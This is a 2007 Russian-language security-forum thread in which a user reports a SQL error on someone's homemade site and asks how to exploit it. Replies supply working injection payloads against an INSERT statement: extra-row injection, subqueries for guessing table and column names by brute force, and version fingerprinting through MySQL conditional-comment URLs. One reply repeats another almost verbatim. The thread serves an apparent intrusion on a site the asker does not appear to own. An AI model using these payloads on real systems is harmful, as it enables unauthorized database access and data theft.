Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Взлом и защита » Уязвимости
Страницы: 1
RSS
SQL ошибка, но не простая ..., Не могу понять как её толком заюзать? Она не такая как все ...
 
#1
Это нравится:0Да/0Нет
21.07.2007 07:41:58
Наткнулся на интересную sql-ошибку в самописном движке. Но я с такими не работал, одно дело например искать sqlэльки в полях ввода данных на форме и т.д. и т.п. Но что посоветуйте делать дальше с этим:

http://site.ru/glava1' -вот последняя добавленная кавычки и даёт ошибку sql

так же и на втором линке:

http://site.ru/glava2' - тоже вылетает ошибка, как быть дальше? Дайте наводку  :D  :!:

Поделитесь пож. своими мыслями!
 
 
 
#2
Это нравится:0Да/0Нет
21.07.2007 09:56:49
перед тем как мыслями делиться. Нужно
а) Задать вопрос
б) Показать какая хоть ошибка то :)
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.
 
 
 
#3
Это нравится:0Да/0Нет
21.07.2007 10:07:09
Вероятно что тут работает регулярное выражение или значение извлекается из переменной стреды или используется mod_rewrite. Только кто-то очень криво его применяет.
Из строки запроса извлекается путь и подставляется в скуль запрос.
 
 
 
#4
Это нравится:0Да/0Нет
21.07.2007 11:13:52
настоящий URL тут скорее всего выглядит так:
http://site.ru/index.php?id=glava1
 
 
 
#5
Это нравится:0Да/0Нет
21.07.2007 12:44:34
забыл про error!  Ошибка вылазиеn такая:
INSERT INTO xer1_stat_xit(id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','/glava1'')

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/glava1'')' at line 1

To fowl    http://site.ru/index.php?id=glava1 - при таком раскладе всё же пишет ошибка 404 =(

*tyler* Всё же мне не очень понятно, как действовать дальше?
 
 
 
#6
Это нравится:0Да/0Нет
21.07.2007 13:19:13
Другое дело. glava1 это значение параметра page_adr
Тебе остается только подобрать имя файла.
 
 
 
#7
Это нравится:0Да/0Нет
21.07.2007 15:24:20
MySQL не поддерживает раздельных запросов.
В insert через эту багу можно добавить сразу несколько записей.
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','glava1'),('24275','5629287','','150','/glava1')/*
В твоем случае этим ничего не добьешься.
Можно использовать подзапросы если версия скуля >= 4.0.
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','
glava1'),((select 9 from предпологаемая_табляца limit 1),'562287','','10','/glava1')/*
Если версия скуля 5 то можно вытащить названия таблиц из information_schema.
Если 4 то методом перебора таблиц а потом и столбцов.
Если 3 то сделай кофе и смотри нашу рашу (немного инфы все же можно вытянуть).
 
 
 
#8
Это нравится:0Да/0Нет
21.07.2007 15:29:48
MySQL не поддерживает раздельных запросов.
В insert через эту багу можно добавить сразу несколько записей.
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','glava1'),('24275','5629287','','150','/glava1')/*
В твоем случае этим ничего не добьешься.
Можно использовать подзапросы если версия скуля >= 4.0.
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','
glava1'),((select 9 from предпологаемая_табляца limit 1),'562287','','10','/glava1')/*
Если версия скуля 5 то можно вытащить названия таблиц из information_schema.
Если 4 то методом перебора таблиц а потом и столбцов.
Если 3 то сделай кофе и смотри нашу рашу (немного инфы все же можно вытянуть).

Версию можно узнать так
http://site.ru/glava1')/*!30000+gb'bgb*//*
http://site.ru/glava1')/*!40000+gb'bgb*//*
http://site.ru/glava1')/*!50000+gb'bgb*//*
Если ошибки кинуло на 2 запросе а на 3 нет  версия 4 и тд.
 
 
 
#9
Это нравится:0Да/0Нет
21.07.2007 16:44:21
Сложновато, но всё же хорошо обьяснили! А вот ошибку выдают везде, кроме этого запроса: ')/*!50000+gb'bgb*//*  Стало быть версия Мускула там 5 ? А каким образом мне  вытащить названия таблиц из information_schema и что конкретно это мне даст?  :oops:
 
 
 
#10
Это нравится:0Да/0Нет
21.07.2007 20:10:02
Версия 4.
Названия таблиц и столбцов можно узнать только подбором
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','
glava1'),((select 9 from например_user limit 1),'562287','','10','/glava1')/*
Потом подбираем столбцы . Если после подстановки ошибки нет значит такая таблица или столбец сущестует
INSERT INTO xer1_stat_xit (id_point,id_session,id_user,id_page,page_adr) VALUES ('2427','562287','','10','
glava1'),((select предпологаемый_столбец from предпологаемая_табляца limit 1),'562287','','10','/glava1')/*
 
 
 
#11
Это нравится:0Да/0Нет
22.07.2007 08:02:13
После некоторых мучений названия таблиц и столбцов я так и не подобрал :|  , но я так понял это эдинственный вариант в моём случае  :?:  или всё таки есть что-то ещё?
 
 
 
Страницы: 1
Читают тему